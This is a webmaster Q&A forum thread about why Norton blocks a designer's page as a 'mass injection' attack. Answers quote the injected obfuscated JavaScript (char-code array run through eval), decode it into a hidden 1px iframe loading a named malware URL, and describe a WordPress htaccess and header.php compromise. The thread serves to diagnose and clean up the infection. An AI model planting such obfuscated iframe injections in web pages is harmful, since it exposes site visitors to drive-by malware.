: Page blocked by antivirus My client reports that [this page][1] I designed is blocked by his antivirus (Norton) : . The rest of the website is not blocked. Do you have any idea why Norton
My client reports that [this page][1] I designed is blocked by his antivirus (Norton) : . The rest of the website is not blocked. Do you have any idea why Norton would block this page ? The report says "web attack: mass injection website 5".
More posts by @Murray432
3 Comments
Sorted by latest first Latest Oldest Best
I have just experienced the same. Someone actually managed to put a bizarr action in my htaccess and at the same time then inserted a very similar code into my header.php (this was on a wordpress installation). I stripped the htaccess and removed the numbered array from the header.
Then, the next day, the code was back in the header, but not in my htaccess. So I removed it from the header again, and now it seems to be gone.
At least I am not blacklisted any more. For the time.
(I upgraded my wordpress and installed a plugin called bulletproof security).
The date on my altered header.php was not changed.
PS: Have a look at this link, and go ahead and edit your htaccess. perishablepress.com/5g-blacklist-2012/
There is definetively some JavaScript embedded in that page that looks fishy. It is a js that is obfuscated by being put as numbers in an array.
Excerpt reproduced below:
<script type="text/javascript" language="javascript"
>
try{window.document.body++}catch(gdsgsdg){dbshre=242;}if(dbshre){asd=0;
try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd)
{e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,101,109,107,100, [....] 23,117,6,4,120,32,32,34,53);s="";for(i=0;i-494!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script> <script type="text/javascript" src="http://intlwellness.com/wp-content/themes/intlwellness/jquery.validate.min.js"></script>
So if you haven't put it there, the site is somehow compromised.
EDIT: If you were to execute the above code in its entirety then it would generate and execute the following JavaScript:
(function () {
var jvskl = document.createElement('iframe');
jvskl.src = 'http://archiwumprasy.com/clk.php';
jvskl.style.position = 'absolute';
jvskl.style.border = '0';
jvskl.style.height = '1px';
jvskl.style.width = '1px';
jvskl.style.left = '1px';
jvskl.style.top = '1px';
if (!document.getElementById('jvskl')) {
document.write('<div id='jvskl'></div>');
document.getElementById('jvskl').appendChild(jvskl);
}
})();
Which, as you can see, creates a hidden iframe that loads a malicious URL. That particular URL is known for distributing malware, however it does appear to be benign currently.
probably someone injected malicious js code in the page.
but checking with google it doesn't seem that there are anything: www.google.com/safebrowsing/diagnostic?site=http://intlwellness.com/
Terms of Use Create Support ticket Your support tickets Stock Market News! © vmapp.org2024 All Rights reserved.